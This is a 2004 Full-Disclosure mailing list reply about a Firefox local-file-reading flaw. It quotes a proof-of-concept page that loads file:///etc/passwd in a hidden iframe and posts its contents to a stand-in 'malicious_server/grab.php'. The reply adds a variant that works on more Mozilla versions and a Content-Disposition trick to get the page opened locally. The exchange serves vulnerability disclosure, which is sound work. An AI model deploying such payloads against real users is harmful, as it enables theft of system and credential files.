On Mon, 6 Dec 2004, Giovanni Delvecchio wrote: > PoC: > === > > Read a local file by inner.HTML method: > > -------------------------------------------------------- > <HTML> > <BODY onLoad="ReadFileContent()" > > <iframe name="local_file" src="file:///etc/passwd" height=0 > width=0></iframe> > > <form name="module" method="post" action="http://malicious_server/grab.php" > ENCTYPE="text/plain"> > <input name="content" type="hidden" size="300" > > </form> > > <script> > > function ReadFileContent(){ > > alert(local_file.document.all(0).innerHTML); > > document.module.content.value+=local_file.document.all(0).innerHTML; > //send content to malicious_server > document.module.submit(); > } > > </script> > </body> > </html>
While I can confirm, that this works with FF 1.0, older versions like 0.9.3 and Mozilla 1.7.3 choked on document.all, which isn't really supported by Mozillas DOM. I got it to work with document.firstChild: --- <HTML> <BODY onLoad="ReadFileContent()" > <iframe id="local_file" name="local_file" src="file:///etc/passwd" height=0 width=0> </iframe> <script> function ReadFileContent(){ alert(local_file.document.firstChild.innerHTML); } </script> </body></html> --- This worked with all versions of Mozilla and Firefox I checked. > Possible method of remote exploitation: > ================================ > > Question: > How could a malicious remote user exploit it ? > > My idea is the following: > After that the user "victim" has required > http://maliciuos_server/page.htm, > if malicious_server responds with a page containing an unknown > Content-Type > field ( for example text/html. ,note the dot) ,the browser will show a > dialog window with some options (open, save, cancel). Choosing "Open" to > view this page, it will be downloaded and opened in local ; javascript > code will be executed in local context. I am offered to "Open with GNU Emacs (default)" under Linux -- but this may have been configured by me a long time ago. On Windows, I can have the default opener set to my browser by adding: Content-Disposition: attachment; filename=cttest.html (the .html is important). bye, ju -- Juergen Schmidt Chefredakteur heise Security www.heisec.de Heise Zeitschriften Verlag, Helstorferstr. 7, D-30625 Hannover Tel. +49 511 5352 300 FAX +49 511 5352 417 EMail [EMAIL PROTECTED] GPG-Key: 0x38EA4970, 5D7B 476D 84D5 94FF E7C5 67BE F895 0A18 38EA 4970 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html